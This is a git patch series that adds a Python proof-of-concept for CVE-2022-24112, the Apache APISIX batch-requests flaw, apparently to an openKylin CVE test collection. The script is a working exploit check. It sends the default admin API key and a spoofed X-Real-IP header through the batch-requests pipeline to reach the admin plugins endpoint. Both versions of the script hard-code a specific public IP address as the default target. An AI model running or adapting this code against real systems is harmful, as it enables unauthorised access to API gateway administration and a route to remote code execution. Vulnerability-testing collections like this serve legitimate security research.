From 7f6d43cb0549762b49c8b07f6143fa804c563bff Mon Sep 17 00:00:00 2001 From: YuanjZhang Date: Thu, 9 Mar 2023 17:43:19 +0800 Subject: [PATCH 1/3] add CVE-2022-24112 --- cve/apache/2022/CVE-2022-24112.py | 33 +++++++++++++++++++++++++++++++ openkylin_list.yaml | 1 + 2 files changed, 34 insertions(+) create mode 100644 cve/apache/2022/CVE-2022-24112.py diff --git a/cve/apache/2022/CVE-2022-24112.py b/cve/apache/2022/CVE-2022-24112.py new file mode 100644 index 00000000..92941782 --- /dev/null +++ b/cve/apache/2022/CVE-2022-24112.py @@ -0,0 +1,33 @@ +import requests +from secrets import token_hex +# Apache APISIX 存在改写 X-REAL-IP header 的风险公告(CVE-2022-24112),利用batch-requests插件 可以RCE +# https://mp.weixin.qq.com/s/5qAfjjVuE4604fMpQoEfMg +# get poc from biu ~ + +def poc(host, port=443): + scheme = 'https' if '443' in str(port) else 'http' + target = '{}://{}:{}'.format(scheme, host, port) + token = token_hex(10) + uris = ['/apisix/batch-requests', '/api-gw/batch'] + hits = [f'failed to load plugin {token}'] + data = {"headers": {'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'X-Real-IP': '127.0.0.1'}, + 'pipeline': [{'path': f'/apisix/admin/plugins/{token}'}]} + + try: + targets = ['{}{}'.format(target, uri) for uri in uris] + with requests.Session() as session: + for target in targets: + response = session.post(target, timeout=10, json=data, verify=False, proxies={'http': "http://127.0.0.1:8080"}) + for hit in hits: + if hit in response.text: + output = response.json() + + return True, host, target, output + except Exception as error: + return False + return False +''' +''' + +print (poc(host='183.66.101.103', port=9080)) + diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7..4a0723d8 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -4,6 +4,7 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 + - CVE-2022-24112 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee From f8e12b78390c3b33aecd21ecf49c4a42fd397ff1 Mon Sep 17 00:00:00 2001 From: YuanjZhang Date: Fri, 10 Mar 2023 13:06:14 +0800 Subject: [PATCH 2/3] add new_CVE --- cve/{apache/2022 => apache-APISIX}/CVE-2022-24112.py | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) rename cve/{apache/2022 => apache-APISIX}/CVE-2022-24112.py (78%) diff --git a/cve/apache/2022/CVE-2022-24112.py b/cve/apache-APISIX/CVE-2022-24112.py similarity index 78% rename from cve/apache/2022/CVE-2022-24112.py rename to cve/apache-APISIX/CVE-2022-24112.py index 92941782..47aecefb 100644 --- a/cve/apache/2022/CVE-2022-24112.py +++ b/cve/apache-APISIX/CVE-2022-24112.py @@ -1,7 +1,8 @@ import requests from secrets import token_hex +import argparse # Apache APISIX 存在改写 X-REAL-IP header 的风险公告(CVE-2022-24112),利用batch-requests插件 可以RCE -# https://mp.weixin.qq.com/s/5qAfjjVuE4604fMpQoEfMg + # get poc from biu ~ def poc(host, port=443): @@ -28,6 +29,9 @@ def poc(host, port=443): return False ''' ''' - -print (poc(host='183.66.101.103', port=9080)) +parser = argparse.ArgumentParser(description='test') +parser.add_argument('--ip', type=str, nargs='?', default='183.66.101.103', help='IP地址') +parser.add_argument('--port', type=int, nargs='?', default=9080, help='端口') +args = parser.parse_args() +print (poc(host=args.ip, port=args.port)) -- Gitee From cc190662b9186aefaf2741d3288eef9593a5eb7f Mon Sep 17 00:00:00 2001 From: YuanjZhang Date: Fri, 10 Mar 2023 06:06:41 +0000 Subject: [PATCH 3/3] update openkylin_list.yaml. Signed-off-by: YuanjZhang --- openkylin_list.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 4a0723d8..6494fa06 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -4,7 +4,8 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 - - CVE-2022-24112 + apache-APISIX: + - CVE-2022-24112 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee